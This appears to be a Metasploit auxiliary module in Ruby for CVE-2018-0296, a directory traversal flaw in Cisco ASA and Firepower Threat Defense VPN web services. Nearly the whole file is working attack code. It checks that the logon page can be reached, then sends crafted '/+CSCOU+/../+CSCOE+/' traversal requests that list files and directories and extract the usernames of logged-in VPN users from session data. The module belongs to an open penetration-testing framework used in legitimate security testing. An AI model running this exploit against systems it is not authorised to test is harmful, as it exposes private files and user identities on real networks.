1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7

8
  include Msf::Exploit::Remote::HttpClient
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Cisco ASA Directory Traversal',
15
        'Description' => %q{
16
          This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software.
17
          It lists the contents of Cisco's VPN web service which includes directories, files, and currently logged in users.
18
        },
19
        'Author' => [
20
          'Michał Bentkowski', # Discovery
21
          'Yassine Aboukir',    # PoC
22
          'Shelby Pace'         # Metasploit Module
23
        ],
24
        'License' => MSF_LICENSE,
25
        'References' => [
26
          [ 'CVE', '2018-0296' ],
27
          [ 'EDB', '44956' ]
28
        ],
29
        'DisclosureDate' => '2018-06-06',
30
        'Notes' => {
31
          'Reliability' => UNKNOWN_RELIABILITY,
32
          'Stability' => UNKNOWN_STABILITY,
33
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
34
        }
35
      )
36
    )
37

38
    register_options(
39
      [
40
        OptString.new('TARGETURI', [ true, 'Path to Cisco installation', '/' ]),
41
        OptBool.new('SSL', [ true, 'Use SSL', true ]),
42
        Opt::RPORT(443)
43
      ]
44
    )
45
  end
46

47
  def is_accessible?
48
    uri = normalize_uri(target_uri.path, '+CSCOE+/logon.html')
49

50
    res = send_request_cgi(
51
      'method' => 'GET',
52
      'uri' => uri
53
    )
54

55
    return (res && (res.body.include?("SSL VPN Service") || res.body.include?("+CSCOE+") || res.body.include?("+webvpn+") || res.body.include?("webvpnlogin")))
56
  end
57

58
  def list_files(path)
59
    uri = normalize_uri(target_uri.path, path)
60

61
    list_res = send_request_cgi(
62
      'method' => 'GET',
63
      'uri' => uri
64
    )
65

66
    if list_res && list_res.code == 200
67
      if list_res.body.match(/\/{3}sessions/)
68
        get_sessions(list_res.body)
69
      else
70
        print_good(list_res.body)
71
      end
72
    end
73
  end
74

75
  def get_sessions(response)
76
    session_nos = response.scan(/([0-9]{2,})/)
77

78
    if session_nos.empty?
79
      print_status("Could not detect any sessions")
80
      print("\n")
81
      return
82
    end
83

84
    print_good(response)
85
    list_users(session_nos)
86
  end
87

88
  def list_users(sessions)
89
    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'
90
    user_ids = Array.new
91

92
    sessions.each do |session_no|
93
      users_res = send_request_cgi(
94
        'method' => 'GET',
95
        'uri' => normalize_uri(target_uri.path, sessions_uri, session_no)
96
      )
97

98
      if users_res && users_res.body.include?('name')
99
        user_ids.push(users_res.body.match(/user:(\w+)/).to_s)
100
      end
101
    end
102

103
    unless user_ids.empty?
104
      print_status('Users logged in:')
105
      user_ids.each { |id| print_good(id) }
106
      print("\n")
107
      return
108
    end
109

110
    print_status("There are no users logged in currently")
111
  end
112

113
  def run
114
    file_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'
115
    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'
116
    cscoe_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'
117

118
    paths = [file_uri, sessions_uri, cscoe_uri]
119

120
    unless is_accessible?
121
      fail_with(Failure::NotFound, 'Failed to reach Cisco web logon service')
122
    end
123

124
    paths.each { |path| list_files(path) }
125
  end
126
end
127

128